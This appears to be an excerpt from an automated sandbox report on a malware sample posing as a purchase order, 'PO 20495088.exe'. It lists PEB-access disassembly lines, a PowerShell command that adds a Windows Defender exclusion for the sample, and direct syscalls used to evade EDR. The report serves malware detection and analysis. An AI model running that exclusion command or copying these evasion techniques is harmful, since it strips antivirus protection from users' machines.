                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0176096E mov eax, dword ptr fs:[00000030h]6_2_0176096E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0176096E mov edx, dword ptr fs:[00000030h]6_2_0176096E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0176096E mov eax, dword ptr fs:[00000030h]6_2_0176096E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A0946 mov eax, dword ptr fs:[00000030h]6_2_017A0946
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A892A mov eax, dword ptr fs:[00000030h]6_2_017A892A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B892B mov eax, dword ptr fs:[00000030h]6_2_017B892B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AC912 mov eax, dword ptr fs:[00000030h]6_2_017AC912
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01718918 mov eax, dword ptr fs:[00000030h]6_2_01718918
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01718918 mov eax, dword ptr fs:[00000030h]6_2_01718918
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179E908 mov eax, dword ptr fs:[00000030h]6_2_0179E908
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179E908 mov eax, dword ptr fs:[00000030h]6_2_0179E908
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017529F9 mov eax, dword ptr fs:[00000030h]6_2_017529F9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017529F9 mov eax, dword ptr fs:[00000030h]6_2_017529F9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AE9E0 mov eax, dword ptr fs:[00000030h]6_2_017AE9E0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A9D0 mov eax, dword ptr fs:[00000030h]6_2_0172A9D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A9D0 mov eax, dword ptr fs:[00000030h]6_2_0172A9D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A9D0 mov eax, dword ptr fs:[00000030h]6_2_0172A9D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A9D0 mov eax, dword ptr fs:[00000030h]6_2_0172A9D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A9D0 mov eax, dword ptr fs:[00000030h]6_2_0172A9D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A9D0 mov eax, dword ptr fs:[00000030h]6_2_0172A9D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017549D0 mov eax, dword ptr fs:[00000030h]6_2_017549D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EA9D3 mov eax, dword ptr fs:[00000030h]6_2_017EA9D3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B69C0 mov eax, dword ptr fs:[00000030h]6_2_017B69C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A89B3 mov esi, dword ptr fs:[00000030h]6_2_017A89B3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A89B3 mov eax, dword ptr fs:[00000030h]6_2_017A89B3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A89B3 mov eax, dword ptr fs:[00000030h]6_2_017A89B3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017329A0 mov eax, dword ptr fs:[00000030h]6_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017329A0 mov eax, dword ptr fs:[00000030h]6_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017329A0 mov eax, dword ptr fs:[00000030h]6_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017329A0 mov eax, dword ptr fs:[00000030h]6_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017329A0 mov eax, dword ptr fs:[00000030h]6_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017329A0 mov eax, dword ptr fs:[00000030h]6_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017329A0 mov eax, dword ptr fs:[00000030h]6_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017329A0 mov eax, dword ptr fs:[00000030h]6_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017329A0 mov eax, dword ptr fs:[00000030h]6_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017329A0 mov eax, dword ptr fs:[00000030h]6_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017329A0 mov eax, dword ptr fs:[00000030h]6_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017329A0 mov eax, dword ptr fs:[00000030h]6_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017329A0 mov eax, dword ptr fs:[00000030h]6_2_017329A0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017209AD mov eax, dword ptr fs:[00000030h]6_2_017209AD
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017209AD mov eax, dword ptr fs:[00000030h]6_2_017209AD
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AE872 mov eax, dword ptr fs:[00000030h]6_2_017AE872
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AE872 mov eax, dword ptr fs:[00000030h]6_2_017AE872
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B6870 mov eax, dword ptr fs:[00000030h]6_2_017B6870
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B6870 mov eax, dword ptr fs:[00000030h]6_2_017B6870
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01750854 mov eax, dword ptr fs:[00000030h]6_2_01750854
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01724859 mov eax, dword ptr fs:[00000030h]6_2_01724859
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01724859 mov eax, dword ptr fs:[00000030h]6_2_01724859
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01732840 mov ecx, dword ptr fs:[00000030h]6_2_01732840
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01742835 mov eax, dword ptr fs:[00000030h]6_2_01742835
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01742835 mov eax, dword ptr fs:[00000030h]6_2_01742835
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01742835 mov eax, dword ptr fs:[00000030h]6_2_01742835
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01742835 mov ecx, dword ptr fs:[00000030h]6_2_01742835
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01742835 mov eax, dword ptr fs:[00000030h]6_2_01742835
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01742835 mov eax, dword ptr fs:[00000030h]6_2_01742835
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A830 mov eax, dword ptr fs:[00000030h]6_2_0175A830
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C483A mov eax, dword ptr fs:[00000030h]6_2_017C483A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C483A mov eax, dword ptr fs:[00000030h]6_2_017C483A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AC810 mov eax, dword ptr fs:[00000030h]6_2_017AC810
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175C8F9 mov eax, dword ptr fs:[00000030h]6_2_0175C8F9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175C8F9 mov eax, dword ptr fs:[00000030h]6_2_0175C8F9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EA8E4 mov eax, dword ptr fs:[00000030h]6_2_017EA8E4
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174E8C0 mov eax, dword ptr fs:[00000030h]6_2_0174E8C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017AC89D mov eax, dword ptr fs:[00000030h]6_2_017AC89D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01720887 mov eax, dword ptr fs:[00000030h]6_2_01720887
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171CB7E mov eax, dword ptr fs:[00000030h]6_2_0171CB7E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CEB50 mov eax, dword ptr fs:[00000030h]6_2_017CEB50
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D4B4B mov eax, dword ptr fs:[00000030h]6_2_017D4B4B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D4B4B mov eax, dword ptr fs:[00000030h]6_2_017D4B4B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B6B40 mov eax, dword ptr fs:[00000030h]6_2_017B6B40
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B6B40 mov eax, dword ptr fs:[00000030h]6_2_017B6B40
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EAB40 mov eax, dword ptr fs:[00000030h]6_2_017EAB40
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C8B42 mov eax, dword ptr fs:[00000030h]6_2_017C8B42
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174EB20 mov eax, dword ptr fs:[00000030h]6_2_0174EB20
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174EB20 mov eax, dword ptr fs:[00000030h]6_2_0174EB20
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E8B28 mov eax, dword ptr fs:[00000030h]6_2_017E8B28
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E8B28 mov eax, dword ptr fs:[00000030h]6_2_017E8B28
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179EB1D mov eax, dword ptr fs:[00000030h]6_2_0179EB1D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179EB1D mov eax, dword ptr fs:[00000030h]6_2_0179EB1D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179EB1D mov eax, dword ptr fs:[00000030h]6_2_0179EB1D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179EB1D mov eax, dword ptr fs:[00000030h]6_2_0179EB1D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179EB1D mov eax, dword ptr fs:[00000030h]6_2_0179EB1D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179EB1D mov eax, dword ptr fs:[00000030h]6_2_0179EB1D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179EB1D mov eax, dword ptr fs:[00000030h]6_2_0179EB1D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179EB1D mov eax, dword ptr fs:[00000030h]6_2_0179EB1D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179EB1D mov eax, dword ptr fs:[00000030h]6_2_0179EB1D
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01728BF0 mov eax, dword ptr fs:[00000030h]6_2_01728BF0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01728BF0 mov eax, dword ptr fs:[00000030h]6_2_01728BF0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01728BF0 mov eax, dword ptr fs:[00000030h]6_2_01728BF0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174EBFC mov eax, dword ptr fs:[00000030h]6_2_0174EBFC
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017ACBF0 mov eax, dword ptr fs:[00000030h]6_2_017ACBF0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CEBD0 mov eax, dword ptr fs:[00000030h]6_2_017CEBD0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01740BCB mov eax, dword ptr fs:[00000030h]6_2_01740BCB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01740BCB mov eax, dword ptr fs:[00000030h]6_2_01740BCB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01740BCB mov eax, dword ptr fs:[00000030h]6_2_01740BCB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01720BCD mov eax, dword ptr fs:[00000030h]6_2_01720BCD
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01720BCD mov eax, dword ptr fs:[00000030h]6_2_01720BCD
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01720BCD mov eax, dword ptr fs:[00000030h]6_2_01720BCD
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730BBE mov eax, dword ptr fs:[00000030h]6_2_01730BBE
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730BBE mov eax, dword ptr fs:[00000030h]6_2_01730BBE
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D4BB0 mov eax, dword ptr fs:[00000030h]6_2_017D4BB0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017D4BB0 mov eax, dword ptr fs:[00000030h]6_2_017D4BB0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179CA72 mov eax, dword ptr fs:[00000030h]6_2_0179CA72
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179CA72 mov eax, dword ptr fs:[00000030h]6_2_0179CA72
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175CA6F mov eax, dword ptr fs:[00000030h]6_2_0175CA6F
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175CA6F mov eax, dword ptr fs:[00000030h]6_2_0175CA6F
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175CA6F mov eax, dword ptr fs:[00000030h]6_2_0175CA6F
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CEA60 mov eax, dword ptr fs:[00000030h]6_2_017CEA60
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01726A50 mov eax, dword ptr fs:[00000030h]6_2_01726A50
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01726A50 mov eax, dword ptr fs:[00000030h]6_2_01726A50
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01726A50 mov eax, dword ptr fs:[00000030h]6_2_01726A50
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01726A50 mov eax, dword ptr fs:[00000030h]6_2_01726A50
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01726A50 mov eax, dword ptr fs:[00000030h]6_2_01726A50
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01726A50 mov eax, dword ptr fs:[00000030h]6_2_01726A50
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01726A50 mov eax, dword ptr fs:[00000030h]6_2_01726A50
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730A5B mov eax, dword ptr fs:[00000030h]6_2_01730A5B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01730A5B mov eax, dword ptr fs:[00000030h]6_2_01730A5B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01744A35 mov eax, dword ptr fs:[00000030h]6_2_01744A35
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01744A35 mov eax, dword ptr fs:[00000030h]6_2_01744A35
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175CA38 mov eax, dword ptr fs:[00000030h]6_2_0175CA38
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175CA24 mov eax, dword ptr fs:[00000030h]6_2_0175CA24
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174EA2E mov eax, dword ptr fs:[00000030h]6_2_0174EA2E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017ACA11 mov eax, dword ptr fs:[00000030h]6_2_017ACA11
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175AAEE mov eax, dword ptr fs:[00000030h]6_2_0175AAEE
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175AAEE mov eax, dword ptr fs:[00000030h]6_2_0175AAEE
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01720AD0 mov eax, dword ptr fs:[00000030h]6_2_01720AD0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01754AD0 mov eax, dword ptr fs:[00000030h]6_2_01754AD0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01754AD0 mov eax, dword ptr fs:[00000030h]6_2_01754AD0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01776ACC mov eax, dword ptr fs:[00000030h]6_2_01776ACC
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01776ACC mov eax, dword ptr fs:[00000030h]6_2_01776ACC
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01776ACC mov eax, dword ptr fs:[00000030h]6_2_01776ACC
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01728AA0 mov eax, dword ptr fs:[00000030h]6_2_01728AA0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01728AA0 mov eax, dword ptr fs:[00000030h]6_2_01728AA0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01776AA4 mov eax, dword ptr fs:[00000030h]6_2_01776AA4
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01758A90 mov edx, dword ptr fs:[00000030h]6_2_01758A90
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172EA80 mov eax, dword ptr fs:[00000030h]6_2_0172EA80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172EA80 mov eax, dword ptr fs:[00000030h]6_2_0172EA80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172EA80 mov eax, dword ptr fs:[00000030h]6_2_0172EA80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172EA80 mov eax, dword ptr fs:[00000030h]6_2_0172EA80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172EA80 mov eax, dword ptr fs:[00000030h]6_2_0172EA80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172EA80 mov eax, dword ptr fs:[00000030h]6_2_0172EA80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172EA80 mov eax, dword ptr fs:[00000030h]6_2_0172EA80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172EA80 mov eax, dword ptr fs:[00000030h]6_2_0172EA80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172EA80 mov eax, dword ptr fs:[00000030h]6_2_0172EA80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F4A80 mov eax, dword ptr fs:[00000030h]6_2_017F4A80
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B8D6B mov eax, dword ptr fs:[00000030h]6_2_017B8D6B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01720D59 mov eax, dword ptr fs:[00000030h]6_2_01720D59
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01720D59 mov eax, dword ptr fs:[00000030h]6_2_01720D59
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01720D59 mov eax, dword ptr fs:[00000030h]6_2_01720D59
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01728D59 mov eax, dword ptr fs:[00000030h]6_2_01728D59
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01728D59 mov eax, dword ptr fs:[00000030h]6_2_01728D59
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01728D59 mov eax, dword ptr fs:[00000030h]6_2_01728D59
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe"
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtUnmapViewOfSection: Direct from: 0x76EF2D3CJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
